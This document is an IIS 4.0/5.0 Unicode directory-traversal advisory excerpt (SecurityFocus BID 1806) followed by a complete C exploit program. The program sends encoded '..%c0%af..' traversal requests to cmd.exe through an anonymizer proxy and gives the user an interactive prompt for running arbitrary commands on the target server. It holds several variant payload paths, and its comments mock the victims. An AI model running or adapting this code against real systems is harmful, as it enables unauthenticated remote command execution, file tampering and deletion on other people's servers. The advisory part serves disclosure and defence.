// source: https://www.securityfocus.com/bid/1806/info
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
This is the vulnerability exploited by the Code Blue Worm.
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.
/* hack IIS 4.0/5.0 with the usefull UNICODE :) and have fun */
/* coded by zipo */
/* to compile: cc -o iisuni iisuni.c */
/* made for all the lame populus :) */
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#define BUFF_LEN 6000
#define HTTP " HTTP/1.0\r\n\r\n"
#define GET "GET http://"
/* this is the anonymous server used */
#define ANON "anon.free.anonymizer.com"
/* this are all the types of bugs */
#define BUG1_STR
"/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
#define BUG2_STR "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"
#define BUG3_STR
"/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
#define BUG4_STR "/"
/* this is the IIS http server port */
#define HTTP_PORT 80
int main (int argc, char *argv[]) {
struct sockaddr_in sin;
struct hostent *he;
char *bug,cmd[BUFF_LEN],recbuffer[BUFF_LEN],buffer[BUFF_LEN];
int sck, i;
if (argc < 3)
bad_params (argv[0]);
switch (atoi(argv[2])) {
case 1:
bug = BUG1_STR;
break;
case 2:
bug = BUG2_STR;
break;
case 3:
bug = BUG3_STR;
break;
case 4:
bug = BUG4_STR;
break;
default:
printf ("Number error\n");
exit(1);
}
while (1) {
printf ("bash# ");
fgets (cmd, sizeof(cmd), stdin);
cmd[strlen(cmd)-1] = '\0';
if (strcmp(cmd, "exit")) {
if (!strcmp(cmd, "clear")) {
system("clear");
continue;
} else if (!strcmp(cmd, "")) {
continue;
} else if (!strcmp(cmd, "?")) {
printf ("Just you need to type in the prompt the M$DOS
command\n");
printf ("to exit type \"exit\" :)\n");
continue;
}
/* prepare the string to be sent */
for (i=0;i<=strlen(cmd);i++) {
if (cmd[i] == 0x20)
cmd[i] = 0x2b;
}
sprintf (buffer, "%s%s%s%s%s", GET, argv[1], bug, cmd, HTTP);
/* get ip */
if ((he = gethostbyname (ANON)) == NULL) {
herror ("host error");
exit (1);
}
/* setup port and other parameters */
sin.sin_port = htons (HTTP_PORT);
sin.sin_family = AF_INET;
memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length);
/* create a socket */
if ((sck = socket (AF_INET, SOCK_STREAM, 6)) < 0) {
perror ("socket() error");
exit (1);
}
/* connect to the sucker */
if ((connect (sck, (struct sockaddr *) &sin, sizeof (sin))) < 0) {
perror ("connect() error");
exit (1);
}
/* send the beautifull string */
write (sck, buffer, sizeof(buffer));
/* recive all ! :) */
read (sck, recbuffer, sizeof(recbuffer));
/* and print it */
recbuffer[strlen(recbuffer)-1]='\0';
printf
("\033[0;7m-------------------------------------Received--------------------
---------------\n");
printf
("%s\n---------------------------------------Done---------------------------
----------\n\033[7;0m", recbuffer);
/* close the socket ... not needed any more */
close (sck);
/* put zero's in the buffers */
bzero (buffer, sizeof(buffer));
bzero (recbuffer, sizeof(recbuffer));
} else {
/* you type "exit" cya :) */
exit(0);
}
}
}
/* you miss a parameter :'-( */
int bad_params (char *prog_name) {
fprintf (stdout, "usage:\n\t%s <hostname> <number>\n", prog_name);
fprintf (stdout,
"-------------------------------------------------------\n");
fprintf (stdout, "<1> msadc\t");
fprintf (stdout, "<2> scripts\t");
fprintf (stdout, "<3> iisadmpwd\t");
fprintf (stdout, "<4> /\n");
fprintf (stdout,
"-------------------------------------------------------\n");
exit (1);
}
/* EOF */